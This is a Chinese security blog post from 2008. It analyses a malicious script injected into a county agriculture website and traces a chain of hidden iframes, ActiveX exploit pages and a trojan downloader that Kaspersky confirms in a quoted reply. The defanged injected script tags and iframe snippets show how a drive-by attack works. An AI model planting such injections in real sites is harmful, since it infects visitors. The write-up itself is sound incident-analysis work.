某县农业网挂马Trojan-Downloader.Win32.ACVE.az等

简介: 某县农业网挂马Trojan-Downloader.Win32.ACVE.az等

该网首页包含代码:

/---

<script c src=hxp://ads***.2*0*-1**0.cn/ad/ad.gif?id=o></script>

---/

#1 hxxp://ads***.2*0*-1**0.cn/ad/ad.gif?id=o 包含代码:

/---

document.writeln("<iframe src=hxxp:cc*caa**ass.cn//11//zz.htm width=100 height=0><//iframe>");

---/

#1.1 hxxp://cc*caa**ass.cn/11/zz.htm 包含代码:

/---

<iframe src=hxxp://www*.h**ry**spal.cn/llbw/48.htm width=50 height=0 border=0></iframe>

---/

#1.1.1 hxxp://www*.h**ry**spal.cn/llbw/41.htm 包含代码:

/---

<Iframe src="hxxp://z*lw**rn*m*8.cn/a14/fxx.htm" width=100 height=0></Iframe>

---/

#1.1.1.1 hxxp://z*lw**rn*m*8.cn/a14/fxx.htm

引用以下页面:

#1.1.1.1.1 hxxp://z*lw**rn*m*8.cn/a14/fx.htm

检测浏览器类型,如果是msie,则输出代码:

/---

<iFrame src=ilink.html width=100 height=0></iframe>

---/

否则输出代码:

/---

<iframe src=flink.html width=100 height=0></iframe>

---/

#1.1.1.1.1.1 hxxp://z*lw**rn*m*8.cn/a14/ilink.html

检测flashPlayer版本,并下载相应的文件:5.swf,i45.swf,i16.swf,i28.swf,i47.swf

#1.1.1.1.1.2 hxxp://z*lw**rn*m*8.cn/a14/flink.html

同上

#1.1.1.1.2 hxxp://z*lw**rn*m*8.cn/a14/ss.html

利用(snpvw.Snapshot Viewer Control.1)漏洞下载hxxp://www.*o*iuy*t*r*.net/new/a14.css

 

 

主 题: RE: a14.css [KLAN-12788462]

发件人: "" <newvirus@kaspersky.com> 发送时间:2008-10-21 12:46:58

Hello,

a14.css - Trojan-Downloader.Win32.ACVE.az

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.

The answer is relevant to the latest bases from update sources.

-----------------

Regards, Vitaly Butuzov

Virus Analyst, Kaspersky Lab.

 

#1.1.1.1.3 hxxp://z*lw**rn*m*8.cn/sina.htm

/---

文件不存在

---/

#1.1.1.1.4 hxxp://z*lw**rn*m*8.cn/UU.htm

利用uusee(clsid:2CACD7BB-1C59-4BBB-8E81-6E83F82C813B)漏洞。

#1.1.1.1.4.1 hxxp://www.*o*iuy*t*r*.net/down/UU.ini

/---

文件不存在

---/

#1.1.1.1.4.2 hxxp://www.uusee.com/mini3/uusee_client_update/remark.php

卡巴斯基报为:Trojan-Downloader.JS.Agent.cgt  

#1.1.1.1.5 hxxp://z*lw**rn*m*8.cn/a14/Thunder.html

利用迅雷(clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F)漏洞下载hxxp://www.*o*iuy*t*r*.net/new/a14.css

#1.1.1.1.6 hxxp://z*lw**rn*m*8.cn/a14/GLWORLD.html

/---

文件不存在

---/

#1.1.1.1.7 hxxp://z*lw**rn*m*8.cn/a14/real.htm

利用RealPlayer(clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F)漏洞下载hxxp://www.*o*iuy*t*r*.net/new/a14.css

#1.1.1.1.8 hxxp://z*lw**rn*m*8.cn/a14/Real.html

同上。


相关文章
|
5天前
|
云安全 人工智能 安全
AI被攻击怎么办?
阿里云提供 AI 全栈安全能力,其中对网络攻击的主动识别、智能阻断与快速响应构成其核心防线,依托原生安全防护为客户筑牢免疫屏障。
|
15天前
|
域名解析 人工智能
【实操攻略】手把手教学,免费领取.CN域名
即日起至2025年12月31日,购买万小智AI建站或云·企业官网,每单可免费领1个.CN域名首年!跟我了解领取攻略吧~
|
9天前
|
安全 Java Android开发
深度解析 Android 崩溃捕获原理及从崩溃到归因的闭环实践
崩溃堆栈全是 a.b.c?Native 错误查不到行号?本文详解 Android 崩溃采集全链路原理,教你如何把“天书”变“说明书”。RUM SDK 已支持一键接入。
604 214
|
存储 人工智能 监控
从代码生成到自主决策:打造一个Coding驱动的“自我编程”Agent
本文介绍了一种基于LLM的“自我编程”Agent系统,通过代码驱动实现复杂逻辑。该Agent以Python为执行引擎,结合Py4j实现Java与Python交互,支持多工具调用、记忆分层与上下文工程,具备感知、认知、表达、自我评估等能力模块,目标是打造可进化的“1.5线”智能助手。
843 61
|
7天前
|
人工智能 移动开发 自然语言处理
2025最新HTML静态网页制作工具推荐:10款免费在线生成器小白也能5分钟上手
晓猛团队精选2025年10款真正免费、无需编程的在线HTML建站工具,涵盖AI生成、拖拽编辑、设计稿转代码等多种类型,均支持浏览器直接使用、快速出图与文件导出,特别适合零基础用户快速搭建个人网站、落地页或企业官网。
1247 157
|
4天前
|
编解码 Linux 数据安全/隐私保护
教程分享免费视频压缩软件,免费视频压缩,视频压缩免费,附压缩方法及学习教程
教程分享免费视频压缩软件,免费视频压缩,视频压缩免费,附压缩方法及学习教程
239 138
|
7天前
|
存储 安全 固态存储
四款WIN PE工具,都可以实现U盘安装教程
Windows PE是基于NT内核的轻量系统,用于系统安装、分区管理及故障修复。本文推荐多款PE制作工具,支持U盘启动,兼容UEFI/Legacy模式,具备备份还原、驱动识别等功能,操作简便,适合新旧电脑维护使用。
521 109